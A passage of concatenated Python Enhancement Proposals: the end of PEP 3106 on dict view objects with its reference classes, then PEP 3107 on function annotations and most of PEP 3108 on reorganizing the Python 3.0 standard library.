# x == set(y) if y is a d_keys instance
#
# and so on for all other operations.
class d_items:
def __init__(self, d):
self.__d = d
def __len__(self):
return len(self.__d)
def __contains__(self, (key, value)):
return key in self.__d and self.__d[key] == value
def __iter__(self):
for key in self.__d:
yield key, self.__d[key]
# As well as the set operations mentioned for d_keys above.
# However the specifications suggested there will not work if
# the values aren't hashable. Fortunately, the operations can
# still be implemented efficiently. For example, this is how
# intersection can be specified:
def __and__(self, other):
if isinstance(other, (set, frozenset, d_keys)):
result = set()
for item in other:
if item in self:
result.add(item)
return result
if not isinstance(other, d_items):
return NotImplemented
d = {}
if len(other) < len(self):
self, other = other, self
for item in self:
if item in other:
key, value = item
d[key] = value
return d.items()
# And here is equality:
def __eq__(self, other):
if isinstance(other, (set, frozenset, d_keys)):
if len(self) != len(other):
return False
for item in other:
if item not in self:
return False
return True
if not isinstance(other, d_items):
return NotImplemented
# XXX We could also just compare the underlying dicts...
if len(self) != len(other):
return False
for item in self:
if item not in other:
return False
return True
def __ne__(self, other):
# XXX Perhaps object.__ne__() should be defined this way.
result = self.__eq__(other)
if result is not NotImplemented:
result = not result
return result
class d_values:
def __init__(self, d):
self.__d = d
def __len__(self):
return len(self.__d)
def __contains__(self, value):
# This is slow, and it's what "x in y" uses as a fallback
# if __contains__ is not defined; but I'd rather make it
# explicit that it is supported.
for v in self:
if v == value:
return True
return False
def __iter__(self):
for key in self.__d:
yield self.__d[key]
def __eq__(self, other):
if not isinstance(other, d_values):
return NotImplemented
if len(self) != len(other):
return False
# XXX Sometimes this could be optimized, but these are the
# semantics: we can't depend on the values to be hashable
# or comparable.
olist = list(other)
for x in self:
try:
olist.remove(x)
except ValueError:
return False
assert olist == []
return True
def __ne__(self, other):
result = self.__eq__(other)
if result is not NotImplemented:
result = not result
return result
Notes:
The view objects are not directly mutable, but don’t implement
__hash__(); their value can change if the underlying dict is mutated.
The only requirements on the underlying dict are that it implements
__getitem__(), __contains__(), __iter__(), and __len__().
We don’t implement .copy() – the presence of a .copy()
method suggests that the copy has the same type as the original, but
that’s not feasible without copying the underlying dict. If you want
a copy of a specific type, like list or set, you can just pass one
of the above to the list() or set() constructor.
The specification implies that the order in which items
are returned by .keys(), .values() and .items() is the same (just as
it was in Python 2.x), because the order is all derived from the dict
iterator (which is presumably arbitrary but stable as long as a dict
isn’t modified). This can be expressed by the following invariant:
list(d.items()) == list(zip(d.keys(), d.values()))
Open Issues
Do we need more of a motivation? I would think that being able to do
set operations on keys and items without having to copy them should
speak for itself.
I’ve left out the implementation of various set operations. These
could still present small surprises.
It would be okay if multiple calls to d.keys() (etc.) returned the
same object, since the object’s only state is the dict to which it
refers. Is this worth having extra slots in the dict object for?
Should that be a weak reference or should the d_keys (etc.) object
live forever once created? Strawman: probably not worth the extra
slots in every dict.
Should d_keys, d_values and d_items have a public instance variable or
method through which one can retrieve the underlying dict? Strawman:
yes (but what should it be called?).
I’m soliciting better names than d_keys, d_values and d_items. These
classes could be public so that their implementations could be reused
by the .keys(), .values() and .items() methods of other mappings. Or
should they?
Should the d_keys, d_values and d_items classes be reusable?
Strawman: yes.
Should they be subclassable? Strawman: yes (but see below).
A particularly nasty issue is whether operations that are specified in
terms of other operations (e.g. .discard()) must really be implemented
in terms of those other operations; this may appear irrelevant but it
becomes relevant if these classes are ever subclassed. Historically,
Python has a really poor track record of specifying the semantics of
highly optimized built-in types clearly in such cases; my strawman is
to continue that trend. Subclassing may still be useful to add new
methods, for example.
I’ll leave the decisions (especially about naming) up to whoever
submits a working implementation.
References
[1] (1, 2)
Java Collections Framework
http://java.sun.com/docs/books/tutorial/collections/index.html
| Final | PEP 3106 – Revamping dict.keys(), .values() and .items() | Standards Track | This PEP proposes to change the .keys(), .values() and .items()
methods of the built-in dict type to return a set-like or unordered
container object whose contents are derived from the underlying
dictionary rather than a list which is a copy of the keys, etc.; and
to remove the .iterkeys(), .itervalues() and .iteritems() methods. |
PEP 3107 – Function Annotations
Author:
Collin Winter <collinwinter at google.com>,
Tony Lownds <tony at lownds.com>
Status:
Final
Type:
Standards Track
Created:
02-Dec-2006
Python-Version:
3.0
Post-History:
Table of Contents
Abstract
Rationale
Fundamentals of Function Annotations
Syntax
Parameters
Return Values
Lambda
Accessing Function Annotations
Use Cases
Standard Library
pydoc and inspect
Relation to Other PEPs
Function Signature Objects (PEP 362)
Implementation
Rejected Proposals
References and Footnotes
Copyright
Abstract
This PEP introduces a syntax for adding arbitrary metadata annotations
to Python functions [1].
Rationale
Because Python’s 2.x series lacks a standard way of annotating a
function’s parameters and return values, a variety of tools
and libraries have appeared to fill this gap. Some
utilise the decorators introduced in PEP 318, while others parse a
function’s docstring, looking for annotations there.
This PEP aims to provide a single, standard way of specifying this
information, reducing the confusion caused by the wide variation in
mechanism and syntax that has existed until this point.
Fundamentals of Function Annotations
Before launching into a discussion of the precise ins and outs of
Python 3.0’s function annotations, let’s first talk broadly about
what annotations are and are not:
Function annotations, both for parameters and return values, are
completely optional.
Function annotations are nothing more than a way of associating
arbitrary Python expressions with various parts of a function at
compile-time.By itself, Python does not attach any particular meaning or
significance to annotations. Left to its own, Python simply makes
these expressions available as described in Accessing Function
Annotations below.
The only way that annotations take on meaning is when they are
interpreted by third-party libraries. These annotation consumers
can do anything they want with a function’s annotations. For
example, one library might use string-based annotations to provide
improved help messages, like so:
def compile(source: "something compilable",
filename: "where the compilable thing comes from",
mode: "is this a single statement or a suite?"):
...
Another library might be used to provide typechecking for Python
functions and methods. This library could use annotations to
indicate the function’s expected input and return types, possibly
something like:
def haul(item: Haulable, *vargs: PackAnimal) -> Distance:
...
However, neither the strings in the first example nor the
type information in the second example have any meaning on their
own; meaning comes from third-party libraries alone.
Following from point 2, this PEP makes no attempt to introduce
any kind of standard semantics, even for the built-in types.
This work will be left to third-party libraries.
Syntax
Parameters
Annotations for parameters take the form of optional expressions that
follow the parameter name:
def foo(a: expression, b: expression = 5):
...
In pseudo-grammar, parameters now look like identifier [:
expression] [= expression]. That is, annotations always precede a
parameter’s default value and both annotations and default values are
optional. Just like how equal signs are used to indicate a default
value, colons are used to mark annotations. All annotation
expressions are evaluated when the function definition is executed,
just like default values.
Annotations for excess parameters (i.e., *args and **kwargs)
are indicated similarly:
def foo(*args: expression, **kwargs: expression):
...
Annotations for nested parameters always follow the name of the
parameter, not the last parenthesis. Annotating all parameters of a
nested parameter is not required:
def foo((x1, y1: expression),
(x2: expression, y2: expression)=(None, None)):
...
Return Values
The examples thus far have omitted examples of how to annotate the
type of a function’s return value. This is done like so:
def sum() -> expression:
...
That is, the parameter list can now be followed by a literal ->
and a Python expression. Like the annotations for parameters, this
expression will be evaluated when the function definition is executed.
The grammar for function definitions [11] is now:
decorator: '@' dotted_name [ '(' [arglist] ')' ] NEWLINE
decorators: decorator+
funcdef: [decorators] 'def' NAME parameters ['->' test] ':' suite
parameters: '(' [typedargslist] ')'
typedargslist: ((tfpdef ['=' test] ',')*
('*' [tname] (',' tname ['=' test])* [',' '**' tname]
| '**' tname)
| tfpdef ['=' test] (',' tfpdef ['=' test])* [','])
tname: NAME [':' test]
tfpdef: tname | '(' tfplist ')'
tfplist: tfpdef (',' tfpdef)* [',']
Lambda
lambda’s syntax does not support annotations. The syntax of
lambda could be changed to support annotations, by requiring
parentheses around the parameter list. However it was decided
[12] not to make this change because:
It would be an incompatible change.
Lambdas are neutered anyway.
The lambda can always be changed to a function.
Accessing Function Annotations
Once compiled, a function’s annotations are available via the
function’s __annotations__ attribute. This attribute is
a mutable dictionary, mapping parameter names to an object
representing the evaluated annotation expression
There is a special key in the __annotations__ mapping,
"return". This key is present only if an annotation was supplied
for the function’s return value.
For example, the following annotation:
def foo(a: 'x', b: 5 + 6, c: list) -> max(2, 9):
...
would result in an __annotations__ mapping of
{'a': 'x',
'b': 11,
'c': list,
'return': 9}
The return key was chosen because it cannot conflict with the name
of a parameter; any attempt to use return as a parameter name
would result in a SyntaxError.
__annotations__ is an empty, mutable dictionary if there are no
annotations on the function or if the functions was created from
a lambda expression.
Use Cases
In the course of discussing annotations, a number of use-cases have
been raised. Some of these are presented here, grouped by what kind
of information they convey. Also included are examples of existing
products and packages that could make use of annotations.
Providing typing information
Type checking ([3], [4])
Let IDEs show what types a function expects and returns ([16])
Function overloading / generic functions ([21])
Foreign-language bridges ([17], [18])
Adaptation ([20], [19])
Predicate logic functions
Database query mapping
RPC parameter marshaling ([22])
Other information
Documentation for parameters and return values ([23])
Standard Library
pydoc and inspect
The pydoc module should display the function annotations when
displaying help for a function. The inspect module should change
to support annotations.
Relation to Other PEPs
Function Signature Objects (PEP 362)
Function Signature Objects should expose the function’s annotations.
The Parameter object may change or other changes may be warranted.
Implementation
A reference implementation has been checked into the py3k (formerly
“p3yk”) branch as revision 53170 [10].
Rejected Proposals
The BDFL rejected the author’s idea for a special syntax for adding
annotations to generators as being “too ugly” [2].
Though discussed early on ([5], [6]), including
special objects in the stdlib for annotating generator functions and
higher-order functions was ultimately rejected as being more
appropriate for third-party libraries; including them in the
standard library raised too many thorny issues.
Despite considerable discussion about a standard type
parameterisation syntax, it was decided that this should also be
left to third-party libraries. ([7],
[8], [9]).
Despite yet more discussion, it was decided not to standardize
a mechanism for annotation interoperability. Standardizing
interoperability conventions at this point would be premature.
We would rather let these conventions develop organically, based
on real-world usage and necessity, than try to force all users
into some contrived scheme. ([13], [14],
[15]).
References and Footnotes
[1]
Unless specifically stated, “function” is generally
used as a synonym for “callable” throughout this document.
[2]
https://mail.python.org/pipermail/python-3000/2006-May/002103.html
[3]
http://web.archive.org/web/20070730120117/http://oakwinter.com/code/typecheck/
[4]
http://web.archive.org/web/20070603221429/http://maxrepo.info/
[5]
https://mail.python.org/pipermail/python-3000/2006-May/002091.html
[6]
https://mail.python.org/pipermail/python-3000/2006-May/001972.html
[7]
https://mail.python.org/pipermail/python-3000/2006-May/002105.html
[8]
https://mail.python.org/pipermail/python-3000/2006-May/002209.html
[9]
https://mail.python.org/pipermail/python-3000/2006-June/002438.html
[10]
http://svn.python.org/view?rev=53170&view=rev
[11]
http://docs.python.org/reference/compound_stmts.html#function-definitions
[12]
https://mail.python.org/pipermail/python-3000/2006-May/001613.html
[13]
https://mail.python.org/pipermail/python-3000/2006-August/002895.html
[14]
https://mail.python.org/pipermail/python-ideas/2007-January/000032.html
[15]
https://mail.python.org/pipermail/python-list/2006-December/420645.html
[16]
http://www.python.org/idle/doc/idle2.html#Tips
[17]
http://www.jython.org/Project/index.html
[18]
http://www.codeplex.com/Wiki/View.aspx?ProjectName=IronPython
[19]
http://peak.telecommunity.com/PyProtocols.html
[20]
http://www.artima.com/weblogs/viewpost.jsp?thread=155123
[21]
http://www-128.ibm.com/developerworks/library/l-cppeak2/
[22]
http://rpyc.wikispaces.com/
[23]
http://docs.python.org/library/pydoc.html
Copyright
This document has been placed in the public domain.
| Final | PEP 3107 – Function Annotations | Standards Track | This PEP introduces a syntax for adding arbitrary metadata annotations
to Python functions [1]. |
PEP 3108 – Standard Library Reorganization
Author:
Brett Cannon <brett at python.org>
Status:
Final
Type:
Standards Track
Created:
01-Jan-2007
Python-Version:
3.0
Post-History:
28-Apr-2008
Table of Contents
Abstract
Modules to Remove
Previously deprecated [done]
Platform-specific with minimal use [done]
IRIX
Mac-specific modules
Solaris
Hardly used [done]
Obsolete
Maintenance Burden
Modules to Rename
PEP 8 violations [done]
Merging C and Python implementations of the same interface
No public, documented interface [done]
Poorly chosen names [done]
Grouping of modules [done]
dbm package
html package
http package
tkinter package
urllib package
xmlrpc package
Transition Plan
Issues
For modules to be removed
In Python 3.0
In Python 2.6
Renaming of modules
Python 3.0
Python 2.6
Open Issues
Renaming of modules maintained outside of the stdlib
Rejected Ideas
Modules that were originally suggested for removal
Introducing a new top-level package
Introducing new packages to contain theme-related modules
References
Copyright
Note
The merging of profile/cProfile as of Python 3.3 did not
occur, and thus is considered abandoned (although it would be
acceptable to do in the future).
Abstract
Just like the language itself, Python’s standard library (stdlib) has
grown over the years to be very rich. But over time some modules
have lost their need to be included with Python. There has also been
an introduction of a naming convention for modules since Python’s
inception that not all modules follow.
Python 3.0 presents a chance to remove modules that do not have
long term usefulness. This chance also allows for the renaming of
modules so that they follow the Python style guide. This
PEP lists modules that should not be included in Python 3.0 or which
need to be renamed.
Modules to Remove
Guido pronounced that “silly old stuff” is to be deleted from the
stdlib for Py3K [8]. This is open-ended on purpose.
Each module to be removed needs to have a justification as to why it
should no longer be distributed with Python. This can range from the
module being deprecated in Python 2.x to being for a platform that is
no longer widely used.
This section of the PEP lists the various modules to be removed. Each
subsection represents a different reason for modules to be
removed. Each module must have a specific justification on top of
being listed in a specific subsection so as to make sure only modules
that truly deserve to be removed are in fact removed.
When a reason mentions how long it has been since a module has been
“uniquely edited”, it is in reference to how long it has been since a
checkin was done specifically for the module and not for a change that
applied universally across the entire stdlib. If an edit time is not
denoted as “unique” then it is the last time the file was edited,
period.
Previously deprecated [done]
PEP 4 lists all modules that have been deprecated in the stdlib.
The specified motivations mirror those listed in
PEP 4. All modules listed
in the PEP at the time of the first alpha release of Python 3.0 will
be removed.
The entire contents of lib-old will also be removed. These modules
have already been removed from being imported but are kept in the
distribution for Python for users that rely upon the code.
cfmfile
Documented as deprecated since Python 2.4 without an explicit
reason.
cl
Documented as obsolete since Python 2.0 or earlier.
Interface to SGI hardware.
md5
Supplanted by the hashlib module.
mimetools
Documented as obsolete in a previous version.
Supplanted by the email package.
MimeWriter
Supplanted by the email package.
mimify
Supplanted by the email package.
multifile
Supplanted by the email package.
posixfile
Locking is better done by fcntl.lockf().
rfc822
Supplanted by the email package.
sha
Supplanted by the hashlib package.
sv
Documented as obsolete since Python 2.0 or earlier.
Interface to obsolete SGI Indigo hardware.
timing
Documented as obsolete since Python 2.0 or earlier.
time.clock() gives better time resolution.
Platform-specific with minimal use [done]
Python supports many platforms, some of which are not widely used or
maintained.
And on some of these platforms there are modules that have limited use
to people on those platforms. Because of their limited usefulness it
would be better to no longer burden the Python development team with
their maintenance.
The modules mentioned below are documented. All undocumented modules
for the specified platforms will also be removed.
IRIX
The IRIX operating system is no longer produced [15].
Removing all modules from the plat-irix[56] directory has been deemed
reasonable because of this fact.
AL/al
Provides sound support on Indy and Indigo workstations.
Both workstations are no longer available.
Code has not been uniquely edited in three years.
cd/CD
CD drive control for SGI systems.
SGI no longer sells machines with IRIX on them.
Code has not been uniquely edited in 14 years.
cddb
Undocumented.
cdplayer
Undocumented.
cl/CL/CL_old
Compression library for SGI systems.
SGI no longer sells machines with IRIX on them.
Code has not been uniquely edited in 14 years.
DEVICE/GL/gl/cgen/cgensuport
GL access, which is the predecessor to OpenGL.
Has not been edited in at least eight years.
Third-party libraries provide better support (PyOpenGL [12]).
ERRNO
Undocumented.
FILE
Undocumented.
FL/fl/flp
Wrapper for the FORMS library [16]
FORMS has not been edited in 12 years.
Library is not widely used.
First eight hits on Google are for Python docs for fl.
fm
Wrapper to the IRIS Font Manager library.
Only available on SGI machines which no longer come with IRIX.
GET
Undocumented.
GLWS
Undocumented.
imgfile
Wrapper for SGI libimage library for imglib image files
(.rgb files).
Python Imaging Library provides read-only support [13].
Not uniquely edited in 13 years.
IN
Undocumented.
IOCTL
Undocumented.
jpeg
Wrapper for JPEG (de)compressor.
Code not uniquely edited in nine years.
Third-party libraries provide better support
(Python Imaging Library [13]).
panel
Undocumented.
panelparser
Undocumented.
readcd
Undocumented.
SV
Undocumented.
torgb
Undocumented.
WAIT
Undocumented.
Mac-specific modules
The Mac-specific modules are not well-maintained (e.g., the bgen
tool used to auto-generate many of the modules has never been
updated to support UCS-4). It is also not Python’s place to maintain
such a large amount of OS-specific modules. Thus all modules under
Lib/plat-mac and Mac are to be removed.
A stub module for proxy access will be provided for use by urllib.
_builtinSuites
Undocumented.
Package under lib-scriptpackages.
Audio_mac
Undocumented.
aepack
OSA support is better through third-party modules.
Appscript [18].
Hard-coded endianness which breaks on Intel Macs.
Might need to rename if Carbon package dependent.
aetools
See aepack.
aetypes
See aepack.
applesingle
Undocumented.
AppleSingle is a binary file format for A/UX.
A/UX no longer distributed.
appletrawmain
Undocumented.
appletrunner
Undocumented.
argvemulator
Undocumented.
autoGIL
Very bad model for using Python with the CFRunLoop.
bgenlocations
Undocumented.
buildtools
Documented as deprecated since Python 2.3 without an explicit
reason.
bundlebuilder
Undocumented.
Carbon
Carbon development has stopped.
Does not support 64-bit systems completely.
Dependent on bgen which has never been updated to support UCS-4
Unicode builds of Python.
CodeWarrior
Undocumented.
Package under lib-scriptpackages.
ColorPicker
Better to use Cocoa for GUIs.
EasyDialogs
Better to use Cocoa for GUIs.
Explorer
Undocumented.
Package under lib-scriptpackages.
Finder
Undocumented.
Package under lib-scriptpackages.
findertools
No longer useful.
FrameWork
Poorly documented.
Not updated to support Carbon Events.
gensuitemodule
See aepack.
ic
icglue
icopen
Not needed on OS X.
Meant to replace ‘open’ which is usually a bad thing to do.
macerrors
Undocumented.
MacOS
Would also mean the removal of binhex.
macostools
macresource
Undocumented.
MiniAEFrame
See aepack.
Nav
Undocumented.
Netscape
Undocumented.
Package under lib-scriptpackages.
OSATerminology
pimp
Undocumented.
PixMapWrapper
Undocumented.
StdSuites
Undocumented.
Package under lib-scriptpackages.
SystemEvents
Undocumented.
Package under lib-scriptpackages.
Terminal
Undocumented.
Package under lib-scriptpackages.
terminalcommand
Undocumented.
videoreader
No longer used.
W
No longer distributed with Python.
Solaris
SUNAUDIODEV/sunaudiodev
Access to the sound card on Sun machines.
Code not uniquely edited in over eight years.
Hardly used [done]
Some platform-independent modules are rarely used. There are a number of
possible explanations for this, including, ease of reimplementation, very
small audience or lack of adherence to more modern standards.
audiodev
Undocumented.
Not edited in five years.
imputil
Undocumented.
Never updated to support absolute imports.
mutex
Easy to implement using a semaphore and a queue.
Cannot block on a lock attempt.
Not uniquely edited since its addition 15 years ago.
Only useful with the ‘sched’ module.
Not thread-safe.
stringold
Function versions of the methods on string objects.
Obsolete since Python 1.6.
Any functionality not in the string object or module will be moved
to the string module (mostly constants).
sunaudio
Undocumented.
Not edited in over seven years.
The sunau module provides similar abilities.
toaiff
Undocumented.
Requires sox library to be installed on the system.
user
Easily handled by allowing the application specify its own
module name, check for existence, and import if found.
new
Just a rebinding of names from the ‘types’ module.
Can also call type built-in to get most types easily.
Docstring states the module is no longer useful as of revision
27241 (2002-06-15).
pure
Written before Pure Atria was bought by Rational which was then
bought by IBM (in other words, very old).
test.testall
From the days before regrtest.
Obsolete
Becoming obsolete signifies that either another module in the stdlib
or a widely distributed third-party library provides a better solution
for what the module is meant for.
Bastion/rexec [done]
Restricted execution / security.
Turned off in Python 2.3.
Modules deemed unsafe.
bsddb185 [done]
Superseded by bsddb3
Not built by default.
Documentation specifies that the “module should never be used
directly in new code”.
Available externally from PyPI.
Canvas [done]
Marked as obsolete in a comment by Guido since 2000
(see http://bugs.python.org/issue210677).
Better to use the Tkinter.Canvas class.
commands [done]
subprocess module replaces it (PEP 324).
Remove getstatus(), move rest to subprocess.
compiler [done]
Having to maintain both the built-in compiler and the stdlib
package is redundant [20].
The AST created by the compiler is available [19].
Mechanism to compile from an AST needs to be added.
dircache [done]
Negligible use.
Easily replicated.
dl [done]
ctypes provides better support for same functionality.
fpformat [done]
All functionality is supported by string interpolation.
htmllib [done]
Superseded by HTMLParser.
ihooks [done]
Undocumented.
For use with rexec which has been turned off since Python 2.3.
imageop [done]
Better support by third-party libraries
(Python Imaging Library [13]).
Unit tests relied on rgbimg and imgfile.
rgbimg was removed in Python 2.6.
imgfile slated for removal in this PEP.
linuxaudiodev [done]
Replaced by ossaudiodev.
mhlib [done]
Should be removed as an individual module; use mailbox
instead.
popen2 [done]
subprocess module replaces it (PEP 324).
sgmllib [done]
Does not fully parse SGML.
In the stdlib for support to htmllib which is slated for removal.
sre [done]
Previously deprecated; import re instead.
stat [TODO need to move all uses over to os.stat()]
os.stat() now returns a tuple with attributes.
Functions in the module should be made into methods for the object
returned by os.stat.
statvfs [done]
os.statvfs now returns a tuple with attributes.
thread [done]
People should use ‘threading’ instead.
Rename ‘thread’ to _thread.
Deprecate dummy_thread and rename _dummy_thread.
Move thread.get_ident over to threading.
Guido has previously supported the deprecation
[9].
urllib [done]
Superseded by urllib2.
Functionality unique to urllib will be kept in the
urllib package.
UserDict [done: 3.0] [TODO handle 2.6]
Not as useful since types can be a superclass.
Useful bits moved to the ‘collections’ module.
UserList/UserString [done]
Not useful since types can be a superclass.
Moved to the ‘collections’ module.
Maintenance Burden
Over the years, certain modules have become a heavy burden upon
python-dev to maintain. In situations like this, it is better for the
module to be given to the community to maintain to free python-dev to
focus more on language support and other modules in the standard
library that do not take up an undue amount of time and effort.
bsddb3
Externally maintained at
http://www.jcea.es/programacion/pybsddb.htm .
Consistent testing instability.
Berkeley DB follows a different release schedule than Python,
leading to the bindings not necessarily being in sync with what is
available.
Modules to Rename
Many modules existed in
the stdlib before PEP 8 came into existence. This has
led to some naming inconsistencies and namespace bloat that should be
addressed.
PEP 8 violations [done]
PEP 8 specifies that modules “should have short, all-lowercase names”
where “underscores can be used … if it improves readability”.
The use of underscores is discouraged in package names.
The following modules violate PEP 8 and are not somehow being renamed
by being moved to a package.
Current Name
Replacement Name
_winreg
winreg
ConfigParser
configparser
copy_reg
copyreg
Queue
queue
SocketServer
socketserver
Merging C and Python implementations of the same interface
Several interfaces have both a Python and C implementation. While it
is great to have a C implementation for speed with a Python
implementation as fallback, there is no need to expose the two
implementations independently in the stdlib. For Python 3.0 all
interfaces with two implementations will be merged into a single
public interface.
The C module is to be given a leading underscore to delineate the fact
that it is not the reference implementation (the Python implementation
is). This means that any semantic difference between the C and Python
versions must be dealt with before Python 3.0 or else the C
implementation will be removed until it can be fixed.
One interface that is not listed below is xml.etree.ElementTree. This
is an externally maintained module and thus is not under the direct
control of the Python development team for renaming. See Open
Issues for a discussion on this.
pickle/cPickle [done]
Rename cPickle to _pickle.
Semantic completeness of C implementation not verified.
profile/cProfile [TODO]
Rename cProfile to _profile.
Semantic completeness of C implementation not verified.
StringIO/cStringIO [done]
Add the class to the ‘io’ module.
No public, documented interface [done]
There are several modules in the stdlib that have no defined public
interface. These modules exist as support code for other modules that
are exposed. Because they are not meant to be used directly they
should be renamed to reflect this fact.
Current Name
Replacement Name
markupbase
_markupbase
Poorly chosen names [done]
A few modules have names that were poorly chosen in hindsight. They
should be renamed so as to prevent their bad name from perpetuating
beyond the 2.x series.
Current Name
Replacement Name
repr
reprlib
test.test_support
test.support
Grouping of modules [done]
As the stdlib has grown, several areas within it have expanded to
include multiple modules (e.g., support for database files). It
thus makes sense to group related modules into packages.
dbm package
Current Name
Replacement Name
anydbm
dbm.__init__ [1]
dbhash
dbm.bsd
dbm
dbm.ndbm
dumbdm
dbm.dumb
gdbm
dbm.gnu
whichdb
dbm.__init__ [1]
[1] (1, 2)
dbm.__init__ can combine anybdbm and whichdb since
the public API for both modules has no name conflict and the
two modules have closely related usage.
html package
Current Name
Replacement Name
HTMLParser
html.parser
htmlentitydefs
html.entities
http package
Current Name
Replacement Name
httplib
http.client
BaseHTTPServer
http.server [2]
CGIHTTPServer
http.server [2]
SimpleHTTPServer
http.server [2]
Cookie
http.cookies
cookielib
http.cookiejar
[2] (1, 2, 3)
The http.server module can combine the specified modules
safely as they have no naming conflicts.
tkinter package
Current Name
Replacement Name
Dialog
tkinter.dialog
FileDialog
tkinter.filedialog [4]
FixTk
tkinter._fix
ScrolledText
tkinter.scrolledtext
SimpleDialog
tkinter.simpledialog [5]
Tix
tkinter.tix
Tkconstants
tkinter.constants
Tkdnd
tkinter.dnd
Tkinter
tkinter.__init__
tkColorChooser
tkinter.colorchooser
tkCommonDialog
tkinter.commondialog
tkFileDialog
tkinter.filedialog [4]
tkFont
tkinter.font
tkMessageBox
tkinter.messagebox
tkSimpleDialog
tkinter.simpledialog [5]
turtle
tkinter.turtle
[4] (1, 2)
tkinter.filedialog can safely combine FileDialog and
tkFileDialog as there are no naming conflicts.
[5] (1, 2)
tkinter.simpledialog can safely combine SimpleDialog
and tkSimpleDialog have no naming conflicts.
urllib package
Originally this new package was to be named url, but because of
the common use of the name as a variable, it has been deemed better
to keep the name urllib and instead shift existing modules around
into a new package.
Current Name
Replacement Name
urllib2
urllib.request, urllib.error
urlparse
urllib.parse
urllib
urllib.parse, urllib.request, urllib.error [6]
robotparser
urllib.robotparser
[6]
The quoting-related functions from urllib will be added
to urllib.parse. urllib.URLOpener and
urllib.FancyUrlOpener will be added to urllib.request
as long as the documentation for both modules is updated.
xmlrpc package
Current Name
Replacement Name
xmlrpclib
xmlrpc.client
DocXMLRPCServer
xmlrpc.server [3]
SimpleXMLRPCServer
xmlrpc.server [3]
[3] (1, 2)
The modules being combined into xmlrpc.server have no
naming conflicts and thus can safely be merged.
Transition Plan
Issues
Issues related to this PEP:
Issue 2775: Master tracking issue
Issue 2828: clean up undoc.rst
For modules to be removed
For module removals, it is easiest to remove the module first in
Python 3.0 to see where dependencies exist. This makes finding
code that (possibly) requires the suppression of the
DeprecationWarning easier.
In Python 3.0
Remove the module.
Remove related tests.
Remove all documentation (typically the module’s documentation
file and its entry in a file for the Library Reference).
Edit Modules/Setup.dist and setup.py if needed.
Run the regression test suite (using -uall); watch out for
tests that are skipped because an import failed for the removed
module.
Check in the change (with an appropriate Misc/NEWS entry).
Update this PEP noting that the 3.0 step is done.
In Python 2.6
Add the following code to the deprecated module if it is
implemented in Python as the first piece of executed code
(adjusting the module name and the warnings import and
needed):from warnings import warnpy3k
warnpy3k("the XXX module has been removed in Python 3.0",
stacklevel=2)
del warnpy3k
or the following if it is an extension module:
if (PyErr_WarnPy3k("the XXX module has been removed in "
"Python 3.0", 2) < 0)
return;
(the Python-Dev TextMate bundle, available from Misc/TextMate,
contains a command that will generate all of this for you).
Update the documentation. For modules with their own documentation
file, use the :deprecated: option with the module directive
along with the deprecated directive, stating the deprecation
is occurring in 2.6, but is for the module’s removal in 3.0.:.. deprecated:: 2.6
The :mod:`XXX` module has been removed in Python 3.0.
For modules simply listed in a file (e.g., undoc.rst), use the
warning directive.
Add the module to the module deletion test in test_py3kwarn.
Suppress the warning in the module’s test code usingtest.test_support.import_module(name, deprecated=True).
Check in the change w/ appropriate Misc/NEWS entry (block
this checkin in py3k!).
Update this PEP noting that the 2.6 step is done.
Renaming of modules
Support in the 2to3 refactoring tool for renames will be used to help
people transition to new module names
[11]. Import statements will be rewritten so that only the import
statement and none of the rest of the code needs to be touched. This
will be accomplished by using the as keyword in import statements
to bind in the module namespace to the old name while importing based
on the new name (when the keyword is not already used, otherwise the
reassigned name should be left alone and only the module that is
imported needs to be changed). The fix_imports fixer is an
example of how to approach this.
Python 3.0
Update 2to3 in the sandbox to support the rename.
Use svn move to rename the module.
Update all import statements in the stdlib to use the new name
(use 2to3’s fix_imports fixer for the easiest solution).
Rename the module in its own documentation.
Update all references in the documentation from the old name to
the new name.
Run regrtest.py -uall to verify the rename worked.
Add an entry in Misc/NEWS.
Commit the changes.
Python 2.6
In the module’s documentation, add a note mentioning that the module is
renamed in Python 3.0:.. note::
The :mod:`OLDNAME` module has been renamed to :mod:`NEWNAME` in
Python 3.0.
Commit the documentation change.
Block the revision in py3k.
Open Issues
Renaming of modules maintained outside of the stdlib
xml.etree.ElementTree not only does not meet PEP 8 naming standards
but it also has an exposed C implementation. It is an
externally maintained package, though PEP 360. A request will be
made for the maintainer to change the name so that it matches PEP 8
and hides the C implementation.
Rejected Ideas
Modules that were originally suggested for removal
asynchat/asyncore
Josiah Carlson has said he will maintain the modules.
audioop/sunau/aifc
Audio modules where the formats are still used.
base64/quopri/uu
All still widely used.
‘codecs’ module does not provide as nice of an API for basic
usage.
fileinput
Useful when having to work with stdin.
linecache
Used internally in several places.
nis
Testimonials from people that new installations of NIS are still
occurring
getopt
Simpler than optparse.
repr
Useful as a basis for overriding.
Used internally.
sched
Useful for simulations.
symtable/_symtable
Docs were written.
telnetlib
Really handy for quick-and-dirty remote access.
Some hardware supports using telnet for configuration and
querying.
Tkinter
Would prevent IDLE from existing.
No GUI toolkit would be available out of the box.
Introducing a new top-level package
It has been suggested that the entire stdlib be placed within its own
package. This PEP will not address this issue as it has its own
design issues (naming, does it deserve special consideration in import
semantics, etc.). Everything within this PEP can easily be handled if
a new top-level package is introduced.
Introducing new packages to contain theme-related modules
During the writing of this PEP it was noticed that certain themes
appeared in the stdlib. In the past people have suggested introducing
new packages to help collect modules that share a similar theme (e.g.,
audio). An Open Issue was created to suggest some new packages to
introduce.
In the end, though, not enough support could be pulled together to
warrant moving forward with the idea. Instead name simplification has
been chosen as the guiding force for PEPs to create.
References
[7]
Python Documentation: Global Module Index
(http://docs.python.org/modindex.html)
[8]
Python-Dev email: “Py3k release schedule worries”
(https://mail.python.org/pipermail/python-3000/2006-December/005130.html)
[9]
Python-Dev email: Autoloading?
(https://mail.python.org/pipermail/python-dev/2005-October/057244.html)
[10]
Python-Dev Summary: 2004-11-01
(http://www.python.org/dev/summary/2004-11-01_2004-11-15/#id10)
[11]
2to3 refactoring tool
(http://svn.python.org/view/sandbox/trunk/2to3/)
[12]
PyOpenGL
(http://pyopengl.sourceforge.net/)
[13] (1, 2, 3)
Python Imaging Library (PIL)
(http://www.pythonware.com/products/pil/)
[14]
Twisted
(http://twistedmatrix.com/trac/)
[15]
SGI Press Release:
End of General Availability for MIPS IRIX Products – December 2006
(http://www.sgi.com/support/mips_irix.html)
[16]
FORMS Library by Mark Overmars
(ftp://ftp.cs.ruu.nl/pub/SGI/FORMS)
[17]
Wikipedia: Au file format
(http://en.wikipedia.org/wiki/Au_file_format)
[18]
appscript
(http://appscript.sourceforge.net/)
[19]
_ast module
(http://docs.python.org/library/ast.html)
[20]
python-dev email: getting compiler package failures
